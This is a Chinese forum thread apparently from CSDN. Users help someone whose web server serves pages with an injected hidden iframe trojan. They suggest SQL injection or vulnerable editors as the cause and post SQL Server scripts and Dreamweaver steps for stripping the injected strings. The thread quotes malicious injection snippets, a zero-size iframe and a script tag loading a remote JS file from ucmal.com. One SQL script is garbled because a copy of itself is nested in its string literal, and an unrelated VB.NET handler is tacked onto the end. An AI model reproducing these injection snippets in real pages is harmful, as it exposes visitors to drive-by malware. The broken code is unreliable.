完了。服务器中了iframe木马，如何解决此问题？

情况是这样的：服务器本地上的.html文件的顶部是不存在别人挂的木马代码，是在客户端浏览时，IE就会弹出阻止提示，当我查看源码时，发现顶部多了一行类似代码：如：<iframe src ="http://www.xx.com/xx.htm height=0 width=0"></iframe>请问此问题如何解决啊？是不是得给服务器重新安装系统啊？

解决方案 »

免费领取超大流量手机卡，每月29元包185G流量+100分钟通话, 中国电信官方发货

看下这个就知道了，http://www.blueidea.com/tech/web/2008/5575.asp
找iframe木马删除工具
http://hi.baidu.com/jiashilong/blog/item/efcd19553c5e26c6b645ae23.html
如何杜绝iframe挂马
http://www.sec120.com/news/Guard/2007-11-27/6956.html
iframe木马删除工具
http://hi.baidu.com/jiashilong/blog/item/efcd19553c5e26c6b645ae23.html
杜绝iframe挂马
http://www.sec120.com/news/Guard/2007-11-27/6956.html
网站被挂iframe木马的解决方案
http://hi.baidu.com/hibeta/blog/item/a8b90df3b72c6bcf0b46e0c6.htmlLZ可以多用用百度和谷歌，中招的肯定不止你一个，看看人家怎么处理的。
请问：wxg22526451如被插入这样恶意代码<script language="JavaScript" type="text/JavaScript">xxxxxx.ccc.cn...</script>
用什么软件删除？多谢！！
楼主应该走根本上解决问题，别以为装个杀毒软件，就完事了，应该走服务器的安全权限配置到程序本身的安全性，我估计是被SQL注入了，楼主方便的话留下QQ，我没接手公司服务器的时候，他们有SQL注入漏洞，还是SA权限，硬盘都被格式化。
我网站中基本上用的是proc的，我想SQL注入不太可能吧？
服务器上的静态html中根本就没有那行多余的代码？
我的QQ是13742618，你的QQ是多少？
二行代码解决全部网页木马(含iframe/script木马)
http://blog.chinaunix.net/u1/54405/showart_698208.html
SQL注入参考：
http://topic.csdn.net/u/20080118/13/62a6579e-c3f1-46d9-9e3b-0e7a3ecbb3d6.html
你用存储过程。假如我在你的一个文本框输入<iframe src ="http://www.xx.com/xx.htm height=0 width=0"> </iframe>  你服务器不做操作直接存储吗？如果你直接存储，那他取出来前台，这个代码是不是执行了呢？
用charfind软件全盘替换一下就成了@charfind可以在网上下载.....
我的首页文件是生成的静态页面，但它怎么会跑到我的页面中？而且是在页面的最上面一行出现，我也查了一下iistart.htm页面，里面没发现那行代码的。
公司的服务器的配置是不安全的，一次我去服务器上看了，竟然有everyone的用户在里面，但我对服务器配置这块不是很熟悉啊。
你IIS权限是怎么配置的？如果你把IIS的权限和NTFS磁盘权限设置好，WEB用户是不能对你飞写入目录进行修改的，如果那样还会这样，就说明服务器本身出问题了。到时候又做另外一番打算。我加你QQ了，你没加我。
http://topic.csdn.net/u/20090422/09/24897b88-33d2-4429-8362-e6c01223afb4.html?seed=1566023030牛人们去帮我看看这个帖子。帮小菜看看。
你用开源的东西没像编辑器之类的
漏洞补补
一般现在写入文件的  都是你上传有问题
不是你的  就是开源的东西的我们公司原来的网站也是老出问题最后才发现是有两个漏洞全是开源的东西
一个是 discuz论坛  一个是fck编辑器
把这两个漏洞补上  到现在有3个月了服务器很正常
再没出现过
--sql2000
--sql 2000解决方法
DECLARE @fieldtype sysname
SET @fieldtype='varchar'--删除处理
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'update '+QUOTENAME(o.name)
    +N' set  '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<iframe src ="http://www.xx.com/xx.htm height=0 width=0"> </iframe>'','''')'
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id
    AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
    AND c.xusertype=t.xusertype
    AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'
--sql 2005 解决方法
declare  @t  varchar(255),@c  varchar(255)
declare  table_cursor  cursor  for
select  a.name,b.name  from  sysobjects  a,syscolumns  b
where  a.iD=b.iD  AnD  a.xtype='u'
AnD  (b.xtype=99  or  b.xtype=35  or  b.xtype=231  or  b.xtype=167)
declare @str varchar(500)
--这里是你要替换的字符
set @str='--sql 2005 解决方法
declare  @t  varchar(255),@c  varchar(255)
declare  table_cursor  cursor  for
select  a.name,b.name  from  sysobjects  a,syscolumns  b
where  a.iD=b.iD  AnD  a.xtype='u'
AnD  (b.xtype=99  or  b.xtype=35  or  b.xtype=231  or  b.xtype=167)
declare @str varchar(500)
--这里是你要替换的字符
set @str='<script_src=http://ucmal.com/0.js> </script>'
open  table_cursor  fetch  next  from  table_cursor
into  @t,@c  while(@@fetch_status=0)
begin
    exec('update  [' + @t + ']  set  [' + @c + ']=replace(cast([' + @c + '] as varchar(8000)),'''+@str+''','''')')
    fetch  next  from  table_cursor  into  @t,@c
end
close  table_cursor  deallocate  table_cursor;
'
open  table_cursor  fetch  next  from  table_cursor
into  @t,@c  while(@@fetch_status=0)
begin
    exec('update  [' + @t + ']  set  [' + @c + ']=replace(cast([' + @c + '] as varchar(8000)),'''+@str+''','''')')
    fetch  next  from  table_cursor  into  @t,@c
end
close  table_cursor  deallocate  table_cursor;
--sql 2005 解决方法
declare  @t  varchar(255),@c  varchar(255)
declare  table_cursor  cursor  for
select  a.name,b.name  from  sysobjects  a,syscolumns  b
where  a.iD=b.iD  AnD  a.xtype='u'
AnD  (b.xtype=99  or  b.xtype=35  or  b.xtype=231  or  b.xtype=167)
declare @str varchar(500)
--这里是你要替换的字符
set @str='<iframe src ="http://www.xx.com/xx.htm height=0 width=0"> </iframe>'
open  table_cursor  fetch  next  from  table_cursor
into  @t,@c  while(@@fetch_status=0)
begin
    exec('update  [' + @t + ']  set  [' + @c + ']=replace(cast([' + @c + '] as varchar(8000)),'''+@str+''','''')')
    fetch  next  from  table_cursor  into  @t,@c
end
close  table_cursor  deallocate  table_cursor;
上面是数据库里面中了木马的解决办法
如果是网页中嵌入木马  那就更简单了
用DW的替换能替换模式是源代码  目标是真个文档VERY EASY
具体操作
打开DreamWeaver  cs3（我用CS3）
编辑---》查找和替换--》弹出替换对话框
查找范围：“文件夹”  路径：就选择你的站点目录
搜索：“源代码”
查找：“<script_src=http://ucmal.com/0.js> </script>“
替换：空
这样你真个网站下被感染木马的网页种凡是带”<script_src=http://ucmal.com/0.js> </script>'
都会被清空
#Private Sub TmSendStatusRequest_Elapsed(ByVal sender As System.Object, ByVal e As System.Timers.ElapsedEventArgs) Handles TmSendStatusRequest.Elapsed
        TmSendStatusRequest.Stop()
        Dim ReturnValue As Boolean = False
        Try
            If (IsConnected = True) Then
                ReturnValue = StatusRequest()
                Exit Try
            End If
        Catch ex As Exception
            EventLog.WriteEntry("PVGAFDS\TmSendStatusRequest_Elapsed", ex.Message.ToString() + Constants.vbCrLf + ex.StackTrace.ToString(), EventLogEntryType.Error)
        Finally
        End Try
        TmSendStatusRequest.Start()
    End Sub